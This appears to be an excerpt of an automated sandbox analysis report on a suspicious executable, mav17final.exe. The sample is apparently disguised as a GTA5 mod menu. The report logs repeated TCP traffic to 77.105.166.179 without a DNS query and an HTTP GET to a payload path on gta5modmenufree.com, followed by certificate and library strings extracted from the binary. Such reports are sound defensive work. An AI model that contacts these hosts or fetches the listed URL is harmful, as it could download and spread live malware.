      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B93C57F8 recv,2_2_00007FF8B93C57F8
      Source: global trafficHTTP traffic detected: GET /CSHQRtZu/standingcpu HTTP/1.1Accept: */*Connection: closeHost: gta5modmenufree.comUser-Agent: cpp-httplib/0.12.6
      Source: global trafficDNS traffic detected: DNS query: gta5modmenufree.com
      Source: mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
      Source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985418927.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986923554.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984841967.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987455616.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984475482.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1988327317.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985418927.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986923554.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984841967.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987455616.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984475482.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF8E000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1988327317.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
      Source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985418927.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986923554.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984841967.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987455616.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984475482.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF8E000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1988327317.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985418927.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986923554.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984841967.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987455616.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984475482.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF8E000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1988327317.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985418927.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986923554.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984841967.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987455616.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984475482.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1988327317.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985418927.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986923554.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984841967.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987455616.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984475482.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF8E000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1988327317.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
      Source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985418927.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986923554.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984841967.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987455616.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984475482.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF8E000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1988327317.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: mav17final.exe, 00000000.00000003.1988327317.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985418927.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986923554.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984841967.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987455616.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984475482.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF8E000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1988327317.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
      Source: mav17final.exe, 00000002.00000003.1996191490.0000018717925000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2063485010.00000187176C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://goo.gl/zeJZl
      Source: mav17final.exe, 00000002.00000002.2066729753.0000018718BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://mail.python.org/pipermail/python-dev/2012-June/120787.html
      Source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985418927.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986923554.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984841967.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987455616.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984475482.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF8E000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1988327317.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985418927.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986923554.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984841967.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987455616.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984475482.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF8E000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1988327317.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
      Source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985418927.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986923554.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984841967.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987455616.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984475482.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1988327317.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
      Source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985418927.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986923554.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984841967.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987455616.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984475482.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF8E000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1988327317.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
      Source: mav17final.exe, 00000002.00000003.1995217340.00000187178BB000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2066729753.0000018718BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
      Source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985418927.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986923554.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984841967.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987455616.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984475482.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF8E000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1988327317.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
      Source: mav17final.exe, 00000002.00000003.1995336796.000001871785B000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1995217340.00000187178BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
      Source: mav17final.exe, 00000002.00000003.1995217340.00000187178BB000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2066729753.0000018718C38000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
      Source: mav17final.exe, 00000002.00000003.2041722275.0000018717654000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2046833551.00000187176AB000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2045701458.0000018717883000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2033297099.0000018717654000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2046317483.00000187176AA000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2052090144.00000187176AC000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2064361091.0000018717883000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2052889217.00000187176B2000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2050639413.0000018717883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
      Source: mav17final.exe, 00000002.00000003.2046884562.0000018715958000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1992798977.000001871595A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2046367139.0000018715944000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2062065450.000001871595F000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2054589272.000001871595A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1991499161.000001871596A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2059550410.000001871595C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
      Source: mav17final.exe, 00000002.00000003.1996176454.0000018717946000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1995683640.00000187178CF000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1995683640.0000018717935000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2063485010.00000187176C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/giampaolo/psutil/issues/875.
      Source: mav17final.exe, 00000002.00000002.2062169744.0000018717208000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
      Source: mav17final.exe, 00000002.00000003.2059550410.000001871595C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
      Source: mav17final.exe, 00000002.00000003.2046884562.0000018715958000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1992798977.000001871595A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2046367139.0000018715944000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2062065450.000001871595F000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2054589272.000001871595A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1991499161.000001871596A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2059550410.000001871595C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
      Source: mav17final.exe, 00000002.00000003.2046884562.0000018715958000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1992798977.000001871595A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2046367139.0000018715944000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2062065450.000001871595F000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2054589272.000001871595A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1991499161.000001871596A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2059550410.000001871595C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
      Source: mav17final.exe, 00000002.00000002.2066729753.0000018718CBC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
      Source: mav17final.exe, 00000002.00000002.2068496795.00007FF8A8CEB000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
